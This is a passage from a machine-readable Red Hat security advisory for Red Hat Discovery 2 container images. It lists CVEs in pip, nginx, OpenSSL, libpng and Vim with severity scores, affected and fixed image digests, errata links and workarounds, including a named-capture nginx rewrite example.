"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pip: Path traversal via malicious entry point name in pip wheel installation allows arbitrary file overwrite"
},
{
"cve": "CVE-2026-9256",
"cwe": {
"id": "CWE-122",
"name": "Heap-based Buffer Overflow"
},
"discovery_date": "2026-05-22T15:00:55.131994+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2480746"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the ngx_http_rewrite_module module of NGINX. When a rewrite directive uses a regex pattern with distinct, overlapping Perl-Compatible Regular Expression (PCRE) captures and a replacement string that references multiple such captures in a redirect or arguments context, an unauthenticated attacker can send crafted HTTP requests and cause a heap-based buffer overflow in the worker process, potentially allowing code execution or a denial of service by forcing the process to restart.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "nginx: ngx_http_rewrite_module: code execution and denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this vulnerability, a rewrite directive must be configured with a regex pattern that uses distinct, overlapping PCRE captures and a replacement string referencing multiple such captures, limiting its exposure as this is not the default configuration. This issue allows an attacker to potentially execute arbitrary code or cause a denial of service by forcing the worker process to restart.\n\nDefault Red Hat Enterprise Linux security features, including SELinux enforcement, Address Space Layout Randomization (ASLR) and NX (No-Execute) stack protection, significantly increase the difficulty of achieving arbitrary code execution, limiting the impact of this vulnerability.\n\nDue to these reasons, this flaw has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-9256"
},
{
"category": "external",
"summary": "RHBZ#2480746",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2480746"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-9256",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-9256"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-9256",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9256"
},
{
"category": "external",
"summary": "https://my.f5.com/manage/s/article/K000161377",
"url": "https://my.f5.com/manage/s/article/K000161377"
}
],
"release_date": "2026-05-22T14:11:41.877000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-29T22:05:31+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33313"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, use named captures instead of unnamed captures in rewrite definitions.\n\nFor example, the following rewrite directive uses unnamed PCRE capture groups, $1 and $2:\n\n~~~\nrewrite ^/users/([0-9]+)/profile/(.*)$ /profile.php?id=$1\u0026tab=$2 last;\n~~~\n\nTo mitigate this vulnerability for this example, replace $1 and $2 with the appropriate named captures, $user_id and $section:\n\n~~~\nrewrite ^/users/(?\u003cuser_id\u003e[0-9]+)/profile/(?\u003csection\u003e.*)$ /profile.php?id=$user_id\u0026tab=$section last;\n~~~",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "nginx: ngx_http_rewrite_module: code execution and denial of service"
},
{
"cve": "CVE-2026-31790",
"cwe": {
"id": "CWE-824",
"name": "Access of Uninitialized Pointer"
},
"discovery_date": "2026-03-25T02:59:10.179000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2451094"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in openssl. Applications that use RSASVE key encapsulation, a method for securely exchanging encryption keys, may inadvertently expose sensitive data. This vulnerability arises when an application processes a malicious, invalid RSA public key provided by an attacker without proper validation. Consequently, the application might send the contents of an uninitialized memory buffer, which could contain confidential information, to the attacker.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openssl: openssl: Information Disclosure from Uninitialized Memory via Invalid RSA Public Key",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Moderate impact. This flaw affects applications utilizing RSASVE key encapsulation, where an attacker-supplied invalid RSA public key is used with EVP_PKEY_encapsulate() without prior validation. This can lead to the disclosure of sensitive, uninitialized memory buffer contents to a malicious peer.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-31790"
},
{
"category": "external",
"summary": "RHBZ#2451094",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451094"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-31790",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-31790"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-31790",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31790"
},
{
"category": "external",
"summary": "https://openssl-library.org/news/secadv/20260407.txt",
"url": "https://openssl-library.org/news/secadv/20260407.txt"
}
],
"release_date": "2026-04-07T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-29T22:05:31+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33313"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "openssl: openssl: Information Disclosure from Uninitialized Memory via Invalid RSA Public Key"
},
{
"cve": "CVE-2026-33416",
"cwe": {
"id": "CWE-825",
"name": "Expired Pointer Dereference"
},
"discovery_date": "2026-03-26T18:01:55.592413+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2451805"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libpng, a library used for processing PNG (Portable Network Graphics) image files. This vulnerability arises from improper memory management where a heap-allocated buffer is aliased between internal data structures. When specific functions are called, a freed memory region can still be referenced, leading to a use-after-free condition. An attacker could potentially exploit this to achieve arbitrary code execution or cause a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libpng: libpng: Arbitrary code execution due to use-after-free vulnerability",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33416"
},
{
"category": "external",
"summary": "RHBZ#2451805",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451805"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33416",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33416"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33416",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33416"
},
{
"category": "external",
"summary": "https://github.com/pnggroup/libpng/commit/23019269764e35ed8458e517f1897bd3c54820eb",
"url": "https://github.com/pnggroup/libpng/commit/23019269764e35ed8458e517f1897bd3c54820eb"
},
{
"category": "external",
"summary": "https://github.com/pnggroup/libpng/commit/7ea9eea884a2328cc7fdcb3c0c00246a50d90667",
"url": "https://github.com/pnggroup/libpng/commit/7ea9eea884a2328cc7fdcb3c0c00246a50d90667"
},
{
"category": "external",
"summary": "https://github.com/pnggroup/libpng/commit/a3a21443ed12bfa1ef46fa0d4fb2b74a0fa34a25",
"url": "https://github.com/pnggroup/libpng/commit/a3a21443ed12bfa1ef46fa0d4fb2b74a0fa34a25"
},
{
"category": "external",
"summary": "https://github.com/pnggroup/libpng/commit/c1b0318b393c90679e6fa5bc1d329fd5d5012ec1",
"url": "https://github.com/pnggroup/libpng/commit/c1b0318b393c90679e6fa5bc1d329fd5d5012ec1"
},
{
"category": "external",
"summary": "https://github.com/pnggroup/libpng/pull/824",
"url": "https://github.com/pnggroup/libpng/pull/824"
},
{
"category": "external",
"summary": "https://github.com/pnggroup/libpng/security/advisories/GHSA-m4pc-p4q3-4c7j",
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-m4pc-p4q3-4c7j"
}
],
"release_date": "2026-03-26T16:48:54.174000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-29T22:05:31+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33313"
},
{
"category": "workaround",
"details": "To reduce exposure, avoid processing untrusted PNG image files with applications that utilize libpng. Restricting the source of PNG images to trusted origins can limit the attack surface.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "libpng: libpng: Arbitrary code execution due to use-after-free vulnerability"
},
{
"cve": "CVE-2026-33636",
"cwe": {
"id": "CWE-124",
"name": "Buffer Underwrite (\u0027Buffer Underflow\u0027)"
},
"discovery_date": "2026-03-26T18:02:51.339603+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2451819"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libpng. A remote attacker could exploit an out-of-bounds read and write vulnerability in the ARM/AArch64 Neon-optimized palette expansion path. This occurs when processing a final partial chunk of 8-bit paletted rows without verifying sufficient input pixels, leading to dereferencing pointers before the start of the row buffer and writing expanded pixel data to underflowed positions. This flaw can result in information disclosure and denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libpng: libpng: Information disclosure and denial of service via out-of-bounds read/write in Neon palette expansion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33636"
},
{
"category": "external",
"summary": "RHBZ#2451819",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451819"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33636",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33636"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33636",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33636"
},
{
"category": "external",
"summary": "https://github.com/pnggroup/libpng/commit/7734cda20cf1236aef60f3bbd2267c97bbb40869",
"url": "https://github.com/pnggroup/libpng/commit/7734cda20cf1236aef60f3bbd2267c97bbb40869"
},
{
"category": "external",
"summary": "https://github.com/pnggroup/libpng/commit/aba9f18eba870d14fb52c5ba5d73451349e339c3",
"url": "https://github.com/pnggroup/libpng/commit/aba9f18eba870d14fb52c5ba5d73451349e339c3"
},
{
"category": "external",
"summary": "https://github.com/pnggroup/libpng/security/advisories/GHSA-wjr5-c57x-95m2",
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-wjr5-c57x-95m2"
}
],
"release_date": "2026-03-26T16:51:58.289000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-29T22:05:31+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33313"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "libpng: libpng: Information disclosure and denial of service via out-of-bounds read/write in Neon palette expansion"
},
{
"cve": "CVE-2026-41411",
"cwe": {
"id": "CWE-78",
"name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
},
"discovery_date": "2026-04-24T18:01:49.275019+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2461614"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Vim, an open-source command-line text editor. This command injection vulnerability occurs during tag file processing. A local user could craft a malicious tags file containing backtick syntax in the filename field. When Vim resolves a tag from this file, it executes the embedded command via the system shell, leading to arbitrary code execution with the privileges of the running user.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vim: Vim: Command injection allows arbitrary code execution via malicious tag files",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-41411"
},
{
"category": "external",
"summary": "RHBZ#2461614",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461614"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-41411",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41411"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-41411",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41411"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/commit/c78194e41d5a0b05b0ddf383b6679b1503f977fb",
